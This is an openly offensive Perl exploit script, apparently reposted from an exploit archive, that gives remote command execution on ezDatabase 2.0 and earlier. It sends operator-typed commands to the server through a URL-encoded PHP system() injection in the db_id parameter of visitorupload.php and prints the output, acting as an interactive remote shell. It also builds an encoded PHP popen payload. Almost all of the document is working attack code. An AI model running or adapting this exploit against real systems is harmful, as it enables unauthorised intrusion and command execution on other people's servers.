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ezDatabase <= 2.0 (db_id) Remote Command Execution Exploit
========================================================== ezDatabase <= 2.0 (db_id) Remote Command Execution Exploit ========================================================== #!/usr/bin/perl # # ezDatabase Remote Command Execution Exploit # based on advisory by Pridels Team # # Copyright (c) 2006 cijfer <cijfer@netti!fi> # All rights reserved. # # never ctrl+c again. # cijfer$ http://target.com/dir # host changed to 'http://target.com/dir' # cijfer$ # # $Id: cijfer-ezdbxpl.pl,v 0.1 2006/01/21 019:22:00 cijfer Exp $ use LWP::UserAgent; use URI::Escape; use Getopt::Long; use Term::ANSIColor; $res = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose); &usage unless $host; while() { print color("green"), "cijfer\$ ", color("reset"); chomp($command = <STDIN>); exit unless $command; if($command =~ m/^http\:\/\/(.*)/g) { $host="http://".$1; print "host changed to '"; print color("bold"), $host."'\n", color("reset"); } &exploit($command,$host); } sub usage { print "ezDatabase Remote Command Execution Exploit\n"; print "Usage: $0 -hp [OPTION]...\n\n"; print " -h --host\tfull address of target (ex. http://www.website.com/directory)\n"; print " -p --proxy\tprovide an HTTP proxy (ex.\n"; print " -v --verbose\tverbose mode\n\n"; exit; } sub exploit { my($command,$host) = @_; $cij=LWP::UserAgent->new() or die; $cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101"); $cij->proxy("http", "http://".$tunnel."/") unless !$proxy; $string = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B"; $string .= uri_escape(shift); $string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F"; $execut = "%3C%3F%24%68%61%6E%64%6C%65%3D%70%6F%70%65%6E"; $execut .= "%5C%28%24%5F%47%45%54%5B%63%69%6A%5D%2C%22%72"; $execut .= "%22%29%3B%77%68%69%6C%65%28%21%66%65%6F%66%28"; $execut .= "%24%68%61%6E%64%6C%65%29%29%7B%24%6C%69%6E%65"; $execut .= "%3D%66%67%65%74%73%28%24%68%61%6E%64%6C%65%29"; $execut .= "%3B%69%66%28%73%74%72%6C%65%6E%28%24%6C%69%6E"; $execut .= "%65%29%3E%3D%31%29%7B%65%63%68%6F%22%24%6C%69"; $execut .= "%6E%65%22%3B%7D%7D%70%63%6C%6F%73%65%28%24%68"; $execut .= "%61%6E%64%6C%65%29%3B%3F%3E"; $out=$cij->get($host."/visitorupload.php?db_id=%3b%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%63%6d%64%5d%29&cmd=".$string); if($out->is_success) { @cij=split("_cijfer_",$out->content); print substr(@cij[1],1); } if($verbose) { $recv=length $out->content; print "Total received bytes: ".$recv."\n"; $sent=length $command; print "Total sent bytes: ".$sent."\n"; } } # 0day.today [2024-12-23] #